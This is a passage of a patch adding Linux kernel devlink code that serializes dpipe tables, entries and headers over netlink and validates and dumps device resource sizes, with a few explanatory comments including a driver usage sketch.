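++ *			.header = &my_header,
++ *			.field_id = MY_FIELD_DIP,
++ *			.header_index = 0,
++ *		};
++ *
++ *		return devlink_dpipe_match_put(skb, &match);
++ *	}
++ */
++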
++static int devlink_dpipe_matches_put(struct devlink_dpipe_table *table,
++				     struct sk_buff *skb)
++{
++	struct nlattr *matches_attr;
++
++	matches_attr = nla_nest_start_noflag(skb,
++					     DEVLINK_ATTR_DPIPE_TABLE_MATCHES);
++	if (!matches_attr)
++		return -EMSGSIZE;
++
++	if (table->table_ops->matches_dump(table->priv, skb))
++		goto nla_put_failure;
++
++	nla_nest_end(skb, matches_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(skb, matches_attr);
++	return -EMSGSIZE;
++}
++
++int devlink_dpipe_action_put(struct sk_buff *skb,
++			     struct devlink_dpipe_action *action)
++{
++	struct devlink_dpipe_header *header = action->header;
++	struct devlink_dpipe_field *field = &header->fields[action->field_id];
++	struct nlattr *action_attr;
++
++	action_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_ACTION);
++	if (!action_attr)
++		return -EMSGSIZE;
++
++	if (nla_put_u32(skb, DEVLINK_ATTR_DPIPE_ACTION_TYPE, action->type) ||
++	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_INDEX, action->header_index) ||
++	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_ID, header->id) ||
++	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_ID, field->id) ||
++	    nla_put_u8(skb, DEVLINK_ATTR_DPIPE_HEADER_GLOBAL, header->global))
++		goto nla_put_failure;
++
++	nla_nest_end(skb, action_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(skb, action_attr);
++	return -EMSGSIZE;
++}
++EXPORT_SYMBOL_GPL(devlink_dpipe_action_put);
++
++static int devlink_dpipe_actions_put(struct devlink_dpipe_table *table,
++				     struct sk_buff *skb)
++{
++	struct nlattr *actions_attr;
++
++	actions_attr = nla_nest_start_noflag(skb,
++					     DEVLINK_ATTR_DPIPE_TABLE_ACTIONS);
++	if (!actions_attr)
++		return -EMSGSIZE;
++
++	if (table->table_ops->actions_dump(table->priv, skb))
++		goto nla_put_failure;
++
++	nla_nest_end(skb, actions_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(skb, actions_attr);
++	return -EMSGSIZE;
++}
++
++static int devlink_dpipe_table_put(struct sk_buff *skb,
++				   struct devlink_dpipe_table *table)
++{
++	struct nlattr *table_attr;
++	u64 table_size;
++
++	table_size = table->table_ops->size_get(table->priv);
++	table_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_TABLE);
++	if (!table_attr)
++		return -EMSGSIZE;
++
++	if (nla_put_string(skb, DEVLINK_ATTR_DPIPE_TABLE_NAME, table->name) ||
++	    nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_TABLE_SIZE, table_size,
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++	if (nla_put_u8(skb, DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED,
++		       table->counters_enabled))
++		goto nla_put_failure;
++
++	if (table->resource_valid) {
++		if (nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_TABLE_RESOURCE_ID,
++				      table->resource_id, DEVLINK_ATTR_PAD) ||
++		    nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_TABLE_RESOURCE_UNITS,
++				      table->resource_units, DEVLINK_ATTR_PAD))
++			goto nla_put_failure;
++	}
++	if (devlink_dpipe_matches_put(table, skb))
++		goto nla_put_failure;
++
++	if (devlink_dpipe_actions_put(table, skb))
++		goto nla_put_failure;
++
++	nla_nest_end(skb, table_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(skb, table_attr);
++	return -EMSGSIZE;
++}
++
++static int devlink_dpipe_send_and_alloc_skb(struct sk_buff **pskb,
++					    struct genl_info *info)
++{
++	int err;
++
++	if (*pskb) {
++		err = genlmsg_reply(*pskb, info);
++		if (err)
++			return err;
++	}
++	*pskb = genlmsg_new(GENLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!*pskb)
++		return -ENOMEM;
++	return 0;
++}
++
++static int devlink_dpipe_tables_fill(struct genl_info *info,
++				     enum devlink_command cmd, int flags,
++				     struct list_head *dpipe_tables,
++				     const char *table_name)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_dpipe_table *table;
++	struct nlattr *tables_attr;
++	struct sk_buff *skb = NULL;
++	struct nlmsghdr *nlh;
++	bool incomplete;
++	void *hdr;
++	int i;
++	int err;
++
++	table = list_first_entry(dpipe_tables,
++				 struct devlink_dpipe_table, list);
++start_again:
++	err = devlink_dpipe_send_and_alloc_skb(&skb, info);
++	if (err)
++		return err;
++
++	hdr = genlmsg_put(skb, info->snd_portid, info->snd_seq,
++			  &devlink_nl_family, NLM_F_MULTI, cmd);
++	if (!hdr) {
++		nlmsg_free(skb);
++		return -EMSGSIZE;
++	}
++
++	if (devlink_nl_put_handle(skb, devlink))
++		goto nla_put_failure;
++	tables_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_TABLES);
++	if (!tables_attr)
++		goto nla_put_failure;
++
++	i = 0;
++	incomplete = false;
++	list_for_each_entry_from(table, dpipe_tables, list) {
++		if (!table_name) {
++			err = devlink_dpipe_table_put(skb, table);
++			if (err) {
++				if (!i)
++					goto err_table_put;
++				incomplete = true;
++				break;
++			}
++		} else {
++			if (!strcmp(table->name, table_name)) {
++				err = devlink_dpipe_table_put(skb, table);
++				if (err)
++					break;
++			}
++		}
++		i++;
++	}
++
++	nla_nest_end(skb, tables_attr);
++	genlmsg_end(skb, hdr);
++	if (incomplete)
++		goto start_again;
++
++send_done:
++	nlh = nlmsg_put(skb, info->snd_portid, info->snd_seq,
++			NLMSG_DONE, 0, flags | NLM_F_MULTI);
++	if (!nlh) {
++		err = devlink_dpipe_send_and_alloc_skb(&skb, info);
++		if (err)
++			return err;
++		goto send_done;
++	}
++
++	return genlmsg_reply(skb, info);
++
++nla_put_failure:
++	err = -EMSGSIZE;
++err_table_put:
++	nlmsg_free(skb);
++	return err;
++}
++
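++/* devlink_dpipe_tables_fill() above emulates a netlink dump in response
++ * to a doit request: devlink_dpipe_send_and_alloc_skb() flushes the
++ * current skb as a reply and allocates a fresh one, tables are packed
++ * until one no longer fits (start_again), and the sequence is closed
++ * with an explicit NLMSG_DONE message.
++ */
++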
++static int devlink_nl_cmd_dpipe_table_get(struct sk_buff *skb,
++					  struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	const char *table_name = NULL;
++
++	if (info->attrs[DEVLINK_ATTR_DPIPE_TABLE_NAME])
++		table_name = nla_data(info->attrs[DEVLINK_ATTR_DPIPE_TABLE_NAME]);
++
++	return devlink_dpipe_tables_fill(info, DEVLINK_CMD_DPIPE_TABLE_GET, 0,
++					 &devlink->dpipe_table_list,
++					 table_name);
++}
++
++static int devlink_dpipe_value_put(struct sk_buff *skb,
++				   struct devlink_dpipe_value *value)
++{
++	if (nla_put(skb, DEVLINK_ATTR_DPIPE_VALUE,
++		    value->value_size, value->value))
++		return -EMSGSIZE;
++	if (value->mask)
++		if (nla_put(skb, DEVLINK_ATTR_DPIPE_VALUE_MASK,
++			    value->value_size, value->mask))
++			return -EMSGSIZE;
++	if (value->mapping_valid)
++		if (nla_put_u32(skb, DEVLINK_ATTR_DPIPE_VALUE_MAPPING,
++				value->mapping_value))
++			return -EMSGSIZE;
++	return 0;
++}
++
++static int devlink_dpipe_action_value_put(struct sk_buff *skb,
++					  struct devlink_dpipe_value *value)
++{
++	if (!value->action)
++		return -EINVAL;
++	if (devlink_dpipe_action_put(skb, value->action))
++		return -EMSGSIZE;
++	if (devlink_dpipe_value_put(skb, value))
++		return -EMSGSIZE;
++	return 0;
++}
++
++static int devlink_dpipe_action_values_put(struct sk_buff *skb,
++					   struct devlink_dpipe_value *values,
++					   unsigned int values_count)
++{
++	struct nlattr *action_attr;
++	int i;
++	int err;
++
++	for (i = 0; i < values_count; i++) {
++		action_attr = nla_nest_start_noflag(skb,
++						    DEVLINK_ATTR_DPIPE_ACTION_VALUE);
++		if (!action_attr)
++			return -EMSGSIZE;
++		err = devlink_dpipe_action_value_put(skb, &values[i]);
++		if (err)
++			goto err_action_value_put;
++		nla_nest_end(skb, action_attr);
++	}
++	return 0;
++
++err_action_value_put:
++	nla_nest_cancel(skb, action_attr);
++	return err;
++}
++
++static int devlink_dpipe_match_value_put(struct sk_buff *skb,
++					 struct devlink_dpipe_value *value)
++{
++	if (!value->match)
++		return -EINVAL;
++	if (devlink_dpipe_match_put(skb, value->match))
++		return -EMSGSIZE;
++	if (devlink_dpipe_value_put(skb, value))
++		return -EMSGSIZE;
++	return 0;
++}
++
++static int devlink_dpipe_match_values_put(struct sk_buff *skb,
++					  struct devlink_dpipe_value *values,
++					  unsigned int values_count)
++{
++	struct nlattr *match_attr;
++	int i;
++	int err;
++
++	for (i = 0; i < values_count; i++) {
++		match_attr = nla_nest_start_noflag(skb,
++						   DEVLINK_ATTR_DPIPE_MATCH_VALUE);
++		if (!match_attr)
++			return -EMSGSIZE;
++		err = devlink_dpipe_match_value_put(skb, &values[i]);
++		if (err)
++			goto err_match_value_put;
++		nla_nest_end(skb, match_attr);
++	}
++	return 0;
++
++err_match_value_put:
++	nla_nest_cancel(skb, match_attr);
++	return err;
++}
++
++static int devlink_dpipe_entry_put(struct sk_buff *skb,
++				   struct devlink_dpipe_entry *entry)
++{
++	struct nlattr *entry_attr, *matches_attr, *actions_attr;
++	int err;
++
++	entry_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_ENTRY);
++	if (!entry_attr)
++		return -EMSGSIZE;
++
++	if (nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_ENTRY_INDEX, entry->index,
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++	if (entry->counter_valid)
++		if (nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_ENTRY_COUNTER,
++				      entry->counter, DEVLINK_ATTR_PAD))
++			goto nla_put_failure;
++
++	matches_attr = nla_nest_start_noflag(skb,
++					     DEVLINK_ATTR_DPIPE_ENTRY_MATCH_VALUES);
++	if (!matches_attr)
++		goto nla_put_failure;
++
++	err = devlink_dpipe_match_values_put(skb, entry->match_values,
++					     entry->match_values_count);
++	if (err) {
++		nla_nest_cancel(skb, matches_attr);
++		goto err_match_values_put;
++	}
++	nla_nest_end(skb, matches_attr);
++
++	actions_attr = nla_nest_start_noflag(skb,
++					     DEVLINK_ATTR_DPIPE_ENTRY_ACTION_VALUES);
++	if (!actions_attr)
++		goto nla_put_failure;
++
++	err = devlink_dpipe_action_values_put(skb, entry->action_values,
++					      entry->action_values_count);
++	if (err) {
++		nla_nest_cancel(skb, actions_attr);
++		goto err_action_values_put;
++	}
++	nla_nest_end(skb, actions_attr);
++
++	nla_nest_end(skb, entry_attr);
++	return 0;
++
++nla_put_failure:
++	err = -EMSGSIZE;
++err_match_values_put:
++err_action_values_put:
++	nla_nest_cancel(skb, entry_attr);
++	return err;
++}
++
++static struct devlink_dpipe_table *
++devlink_dpipe_table_find(struct list_head *dpipe_tables,
++			 const char *table_name, struct devlink *devlink)
++{
++	struct devlink_dpipe_table *table;
++
++	list_for_each_entry_rcu(table, dpipe_tables, list,
++				lockdep_is_held(&devlink->lock)) {
++		if (!strcmp(table->name, table_name))
++			return table;
++	}
++	return NULL;
++}
++
++int devlink_dpipe_entry_ctx_prepare(struct devlink_dpipe_dump_ctx *dump_ctx)
++{
++	struct devlink *devlink;
++	int err;
++
++	err = devlink_dpipe_send_and_alloc_skb(&dump_ctx->skb,
++					       dump_ctx->info);
++	if (err)
++		return err;
++
++	dump_ctx->hdr = genlmsg_put(dump_ctx->skb,
++				    dump_ctx->info->snd_portid,
++				    dump_ctx->info->snd_seq,
++				    &devlink_nl_family, NLM_F_MULTI,
++				    dump_ctx->cmd);
++	if (!dump_ctx->hdr)
++		goto nla_put_failure;
++
++	devlink = dump_ctx->info->user_ptr[0];
++	if (devlink_nl_put_handle(dump_ctx->skb, devlink))
++		goto nla_put_failure;
++	dump_ctx->nest = nla_nest_start_noflag(dump_ctx->skb,
++					       DEVLINK_ATTR_DPIPE_ENTRIES);
++	if (!dump_ctx->nest)
++		goto nla_put_failure;
++	return 0;
++
++nla_put_failure:
++	nlmsg_free(dump_ctx->skb);
++	return -EMSGSIZE;
++}
++EXPORT_SYMBOL_GPL(devlink_dpipe_entry_ctx_prepare);
++
++int devlink_dpipe_entry_ctx_append(struct devlink_dpipe_dump_ctx *dump_ctx,
++				   struct devlink_dpipe_entry *entry)
++{
++	return devlink_dpipe_entry_put(dump_ctx->skb, entry);
++}
++EXPORT_SYMBOL_GPL(devlink_dpipe_entry_ctx_append);
++
++int devlink_dpipe_entry_ctx_close(struct devlink_dpipe_dump_ctx *dump_ctx)
++{
++	nla_nest_end(dump_ctx->skb, dump_ctx->nest);
++	genlmsg_end(dump_ctx->skb, dump_ctx->hdr);
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_dpipe_entry_ctx_close);
++
++void devlink_dpipe_entry_clear(struct devlink_dpipe_entry *entry)
++{
++	unsigned int value_count, value_index;
++	struct devlink_dpipe_value *value;
++
++	value = entry->action_values;
++	value_count = entry->action_values_count;
++	for (value_index = 0; value_index < value_count; value_index++) {
++		kfree(value[value_index].value);
++		kfree(value[value_index].mask);
++	}
++
++	value = entry->match_values;
++	value_count = entry->match_values_count;
++	for (value_index = 0; value_index < value_count; value_index++) {
++		kfree(value[value_index].value);
++		kfree(value[value_index].mask);
++	}
++}
++EXPORT_SYMBOL_GPL(devlink_dpipe_entry_clear);
++
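++/* Illustrative sketch (not part of the original patch) of how a driver
++ * is expected to use the dump-context helpers above from its
++ * entries_dump table op; my_table_entry_fill() is a hypothetical
++ * helper that allocates and fills one entry.
++ *
++ *	static int my_table_entries_dump(void *priv, bool counters_enabled,
++ *					 struct devlink_dpipe_dump_ctx *dump_ctx)
++ *	{
++ *		struct devlink_dpipe_entry entry = {};
++ *		int err;
++ *
++ *		err = devlink_dpipe_entry_ctx_prepare(dump_ctx);
++ *		if (err)
++ *			return err;
++ *		err = my_table_entry_fill(priv, &entry, counters_enabled);
++ *		if (!err)
++ *			err = devlink_dpipe_entry_ctx_append(dump_ctx, &entry);
++ *		devlink_dpipe_entry_clear(&entry);
++ *		if (err)
++ *			return err;
++ *		return devlink_dpipe_entry_ctx_close(dump_ctx);
++ *	}
++ */
++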
++static int devlink_dpipe_entries_fill(struct genl_info *info,
++				      enum devlink_command cmd, int flags,
++				      struct devlink_dpipe_table *table)
++{
++	struct devlink_dpipe_dump_ctx dump_ctx;
++	struct nlmsghdr *nlh;
++	int err;
++
++	dump_ctx.skb = NULL;
++	dump_ctx.cmd = cmd;
++	dump_ctx.info = info;
++
++	err = table->table_ops->entries_dump(table->priv,
++					     table->counters_enabled,
++					     &dump_ctx);
++	if (err)
++		return err;
++
++send_done:
++	nlh = nlmsg_put(dump_ctx.skb, info->snd_portid, info->snd_seq,
++			NLMSG_DONE, 0, flags | NLM_F_MULTI);
++	if (!nlh) {
++		err = devlink_dpipe_send_and_alloc_skb(&dump_ctx.skb, info);
++		if (err)
++			return err;
++		goto send_done;
++	}
++	return genlmsg_reply(dump_ctx.skb, info);
++}
++
++static int devlink_nl_cmd_dpipe_entries_get(struct sk_buff *skb,
++					    struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_dpipe_table *table;
++	const char *table_name;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_DPIPE_TABLE_NAME))
++		return -EINVAL;
++
++	table_name = nla_data(info->attrs[DEVLINK_ATTR_DPIPE_TABLE_NAME]);
++	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
++					 table_name, devlink);
++	if (!table)
++		return -EINVAL;
++
++	if (!table->table_ops->entries_dump)
++		return -EINVAL;
++
++	return devlink_dpipe_entries_fill(info, DEVLINK_CMD_DPIPE_ENTRIES_GET,
++					  0, table);
++}
++
++static int devlink_dpipe_fields_put(struct sk_buff *skb,
++				    const struct devlink_dpipe_header *header)
++{
++	struct devlink_dpipe_field *field;
++	struct nlattr *field_attr;
++	int i;
++
++	for (i = 0; i < header->fields_count; i++) {
++		field = &header->fields[i];
++		field_attr = nla_nest_start_noflag(skb,
++						   DEVLINK_ATTR_DPIPE_FIELD);
++		if (!field_attr)
++			return -EMSGSIZE;
++		if (nla_put_string(skb, DEVLINK_ATTR_DPIPE_FIELD_NAME, field->name) ||
++		    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_ID, field->id) ||
++		    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_BITWIDTH, field->bitwidth) ||
++		    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_MAPPING_TYPE, field->mapping_type))
++			goto nla_put_failure;
++		nla_nest_end(skb, field_attr);
++	}
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(skb, field_attr);
++	return -EMSGSIZE;
++}
++
++static int devlink_dpipe_header_put(struct sk_buff *skb,
++				    struct devlink_dpipe_header *header)
++{
++	struct nlattr *fields_attr, *header_attr;
++	int err;
++
++	header_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_HEADER);
++	if (!header_attr)
++		return -EMSGSIZE;
++
++	if (nla_put_string(skb, DEVLINK_ATTR_DPIPE_HEADER_NAME, header->name) ||
++	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_ID, header->id) ||
++	    nla_put_u8(skb, DEVLINK_ATTR_DPIPE_HEADER_GLOBAL, header->global))
++		goto nla_put_failure;
++
++	fields_attr = nla_nest_start_noflag(skb,
++					    DEVLINK_ATTR_DPIPE_HEADER_FIELDS);
++	if (!fields_attr)
++		goto nla_put_failure;
++
++	err = devlink_dpipe_fields_put(skb, header);
++	if (err) {
++		nla_nest_cancel(skb, fields_attr);
++		goto nla_put_failure;
++	}
++	nla_nest_end(skb, fields_attr);
++	nla_nest_end(skb, header_attr);
++	return 0;
++
++nla_put_failure:
++	err = -EMSGSIZE;
++	nla_nest_cancel(skb, header_attr);
++	return err;
++}
++
++static int devlink_dpipe_headers_fill(struct genl_info *info,
++				      enum devlink_command cmd, int flags,
++				      struct devlink_dpipe_headers *
++				      dpipe_headers)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct nlattr *headers_attr;
++	struct sk_buff *skb = NULL;
++	struct nlmsghdr *nlh;
++	void *hdr;
++	int i, j;
++	int err;
++
++	i = 0;
++start_again:
++	err = devlink_dpipe_send_and_alloc_skb(&skb, info);
++	if (err)
++		return err;
++
++	hdr = genlmsg_put(skb, info->snd_portid, info->snd_seq,
++			  &devlink_nl_family, NLM_F_MULTI, cmd);
++	if (!hdr) {
++		nlmsg_free(skb);
++		return -EMSGSIZE;
++	}
++
++	if (devlink_nl_put_handle(skb, devlink))
++		goto nla_put_failure;
++	headers_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_HEADERS);
++	if (!headers_attr)
++		goto nla_put_failure;
++
++	j = 0;
++	for (; i < dpipe_headers->headers_count; i++) {
++		err = devlink_dpipe_header_put(skb, dpipe_headers->headers[i]);
++		if (err) {
++			if (!j)
++				goto err_table_put;
++			break;
++		}
++		j++;
++	}
++	nla_nest_end(skb, headers_attr);
++	genlmsg_end(skb, hdr);
++	if (i != dpipe_headers->headers_count)
++		goto start_again;
++
++send_done:
++	nlh = nlmsg_put(skb, info->snd_portid, info->snd_seq,
++			NLMSG_DONE, 0, flags | NLM_F_MULTI);
++	if (!nlh) {
++		err = devlink_dpipe_send_and_alloc_skb(&skb, info);
++		if (err)
++			return err;
++		goto send_done;
++	}
++	return genlmsg_reply(skb, info);
++
++nla_put_failure:
++	err = -EMSGSIZE;
++err_table_put:
++	nlmsg_free(skb);
++	return err;
++}
++
++static int devlink_nl_cmd_dpipe_headers_get(struct sk_buff *skb,
++					    struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++
++	if (!devlink->dpipe_headers)
++		return -EOPNOTSUPP;
++	return devlink_dpipe_headers_fill(info, DEVLINK_CMD_DPIPE_HEADERS_GET,
++					  0, devlink->dpipe_headers);
++}
++
++static int devlink_dpipe_table_counters_set(struct devlink *devlink,
++					    const char *table_name,
++					    bool enable)
++{
++	struct devlink_dpipe_table *table;
++
++	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
++					 table_name, devlink);
++	if (!table)
++		return -EINVAL;
++
++	if (table->counter_control_extern)
++		return -EOPNOTSUPP;
++
++	if (!(table->counters_enabled ^ enable))
++		return 0;
++
++	table->counters_enabled = enable;
++	if (table->table_ops->counters_set_update)
++		table->table_ops->counters_set_update(table->priv, enable);
++	return 0;
++}
++
++static int devlink_nl_cmd_dpipe_table_counters_set(struct sk_buff *skb,
++						   struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	const char *table_name;
++	bool counters_enable;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_DPIPE_TABLE_NAME) ||
++	    GENL_REQ_ATTR_CHECK(info,
++				DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED))
++		return -EINVAL;
++
++	table_name = nla_data(info->attrs[DEVLINK_ATTR_DPIPE_TABLE_NAME]);
++	counters_enable = !!nla_get_u8(info->attrs[DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED]);
++
++	return devlink_dpipe_table_counters_set(devlink, table_name,
++						counters_enable);
++}
++
++static struct devlink_resource *
++devlink_resource_find(struct devlink *devlink,
++		      struct devlink_resource *resource, u64 resource_id)
++{
++	struct list_head *resource_list;
++
++	if (resource)
++		resource_list = &resource->resource_list;
++	else
++		resource_list = &devlink->resource_list;
++
++	list_for_each_entry(resource, resource_list, list) {
++		struct devlink_resource *child_resource;
++
++		if (resource->id == resource_id)
++			return resource;
++
++		child_resource = devlink_resource_find(devlink, resource,
++						       resource_id);
++		if (child_resource)
++			return child_resource;
++	}
++	return NULL;
++}
++
++static void
++devlink_resource_validate_children(struct devlink_resource *resource)
++{
++	struct devlink_resource *child_resource;
++	bool size_valid = true;
++	u64 parts_size = 0;
++
++	if (list_empty(&resource->resource_list))
++		goto out;
++
++	list_for_each_entry(child_resource, &resource->resource_list, list)
++		parts_size += child_resource->size_new;
++
++	if (parts_size > resource->size_new)
++		size_valid = false;
++out:
++	resource->size_valid = size_valid;
++}
++
++static int
++devlink_resource_validate_size(struct devlink_resource *resource, u64 size,
++			       struct netlink_ext_ack *extack)
++{
++	u64 remainder;
++	int err = 0;
++
++	if (size > resource->size_params.size_max) {
++		NL_SET_ERR_MSG_MOD(extack, "Size larger than maximum");
++		err = -EINVAL;
++	}
++
++	if (size < resource->size_params.size_min) {
++		NL_SET_ERR_MSG_MOD(extack, "Size smaller than minimum");
++		err = -EINVAL;
++	}
++
++	div64_u64_rem(size, resource->size_params.size_granularity, &remainder);
++	if (remainder) {
++		NL_SET_ERR_MSG_MOD(extack, "Wrong granularity");
++		err = -EINVAL;
++	}
++
++	return err;
++}
++
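++/* Worked example for devlink_resource_validate_size(): with
++ * size_min = 128, size_max = 4096 and size_granularity = 128 (numbers
++ * picked for illustration), a requested size of 200 passes the min/max
++ * checks but fails the granularity check since 200 % 128 != 0, while
++ * 256 would be accepted. Note that each failing check overwrites the
++ * previous extack message, so only the last failure is reported.
++ */
++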
++static int devlink_nl_cmd_resource_set(struct sk_buff *skb,
++				       struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_resource *resource;
++	u64 resource_id;
++	u64 size;
++	int err;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_RESOURCE_ID) ||
++	    GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_RESOURCE_SIZE))
++		return -EINVAL;
++	resource_id = nla_get_u64(info->attrs[DEVLINK_ATTR_RESOURCE_ID]);
++
++	resource = devlink_resource_find(devlink, NULL, resource_id);
++	if (!resource)
++		return -EINVAL;
++
++	size = nla_get_u64(info->attrs[DEVLINK_ATTR_RESOURCE_SIZE]);
++	err = devlink_resource_validate_size(resource, size, info->extack);
++	if (err)
++		return err;
++
++	resource->size_new = size;
++	devlink_resource_validate_children(resource);
++	if (resource->parent)
++		devlink_resource_validate_children(resource->parent);
++	return 0;
++}
++
++static int
++devlink_resource_size_params_put(struct devlink_resource *resource,
++				 struct sk_buff *skb)
++{
++	struct devlink_resource_size_params *size_params;
++
++	size_params = &resource->size_params;
++	if (nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE_GRAN,
++			      size_params->size_granularity, DEVLINK_ATTR_PAD) ||
++	    nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE_MAX,
++			      size_params->size_max, DEVLINK_ATTR_PAD) ||
++	    nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE_MIN,
++			      size_params->size_min, DEVLINK_ATTR_PAD) ||
++	    nla_put_u8(skb, DEVLINK_ATTR_RESOURCE_UNIT, size_params->unit))
++		return -EMSGSIZE;
++	return 0;
++}
++
++static int devlink_resource_occ_put(struct devlink_resource *resource,
++				    struct sk_buff *skb)
++{
++	if (!resource->occ_get)
++		return 0;
++	return nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_OCC,
++				 resource->occ_get(resource->occ_get_priv),
++				 DEVLINK_ATTR_PAD);
++}
++
++static int devlink_resource_put(struct devlink *devlink, struct sk_buff *skb,
++				struct devlink_resource *resource)
++{
++	struct devlink_resource *child_resource;
++	struct nlattr *child_resource_attr;
++	struct nlattr *resource_attr;
++
++	resource_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_RESOURCE);
++	if (!resource_attr)
++		return -EMSGSIZE;
++
++	if (nla_put_string(skb, DEVLINK_ATTR_RESOURCE_NAME, resource->name) ||
++	    nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE, resource->size,
++			      DEVLINK_ATTR_PAD) ||
++	    nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_ID, resource->id,
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++	if (resource->size != resource->size_new)
++		nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE_NEW,
++				  resource->size_new, DEVLINK_ATTR_PAD);
++	if (devlink_resource_occ_put(resource, skb))
++		goto nla_put_failure;
++	if (devlink_resource_size_params_put(resource, skb))
++		goto nla_put_failure;
++	if (list_empty(&resource->resource_list))
++		goto out;
++
++	if (nla_put_u8(skb, DEVLINK_ATTR_RESOURCE_SIZE_VALID,
++		       resource->size_valid))
++		goto nla_put_failure;
++
++	child_resource_attr = nla_nest_start_noflag(skb,
++						    DEVLINK_ATTR_RESOURCE_LIST);
++	if (!child_resource_attr)
++		goto nla_put_failure;
++
++	list_for_each_entry(child_resource, &resource->resource_list, list) {
++		if (devlink_resource_put(devlink, skb, child_resource))
++			goto resource_put_failure;
++	}
++
++	nla_nest_end(skb, child_resource_attr);
++out:
++	nla_nest_end(skb, resource_attr);
++	return 0;
++
++resource_put_failure:
++	nla_nest_cancel(skb, child_resource_attr);
++nla_put_failure:
++	nla_nest_cancel(skb, resource_attr);
++	return -EMSGSIZE;
++}
++
++static int devlink_resource_fill(struct genl_info *info,
++				 enum devlink_command cmd, int flags)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_resource *resource;
++	struct nlattr *resources_attr;
++	struct sk_buff *skb = NULL;
++	struct nlmsghdr *nlh;
++	bool incomplete;
++	void *hdr;
++	int i;
++	int err;
++
++	resource = list_first_entry(&devlink->resource_list,
++				    struct devlink_resource, list);
++start_again:
++	err = devlink_dpipe_send_and_alloc_skb(&skb, info);
++	if (err)
++		return err;
++
++	hdr = genlmsg_put(skb, info->snd_portid, info->snd_seq,
++			  &devlink_nl_family, NLM_F_MULTI, cmd);
++	if (!hdr) {
++		nlmsg_free(skb);
++		return -EMSGSIZE;
++	}
++
++	if (devlink_nl_put_handle(skb, devlink))
++		goto nla_put_failure;
++
++	resources_attr = nla_nest_start_noflag(skb,
++					       DEVLINK_ATTR_RESOURCE_LIST);
++	if (!resources_attr)
++		goto nla_put_failure;
++
++	incomplete = false;
++	i = 0;
++	list_for_each_entry_from(resource, &devlink->resource_list, list) {
++		err = devlink_resource_put(devlink, skb, resource);
++		if (err) {
++			if (!i)
++				goto err_resource_put;
++			incomplete = true;
++			break;
++		}
++		i++;
++	}
++	nla_nest_end(skb, resources_attr);
++	genlmsg_end(skb, hdr);
++	if (incomplete)
++		goto start_again;
++send_done:
++	nlh = nlmsg_put(skb, info->snd_portid, info->snd_seq,
++			NLMSG_DONE, 0, flags | NLM_F_MULTI);
++	if (!nlh) {
++		err = devlink_dpipe_send_and_alloc_skb(&skb, info);
++		if (err)
++			return err;
++		goto send_done;
++	}
++	return genlmsg_reply(skb, info);
++
++nla_put_failure:
++	err = -EMSGSIZE;
++err_resource_put:
++	nlmsg_free(skb);
++	return err;
++}
++
++static int devlink_nl_cmd_resource_dump(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++
++	if (list_empty(&devlink->resource_list))
++		return -EOPNOTSUPP;
++
++	return devlink_resource_fill(info, DEVLINK_CMD_RESOURCE_DUMP, 0);
++}
++
++static int
++devlink_resources_validate(struct devlink *devlink,
++			   struct devlink_resource *resource,
++			   struct genl_info *info)
++{
++	struct list_head *resource_list;
++	int err = 0;
++
++	if (resource)
++		resource_list = &resource->resource_list;
++	else
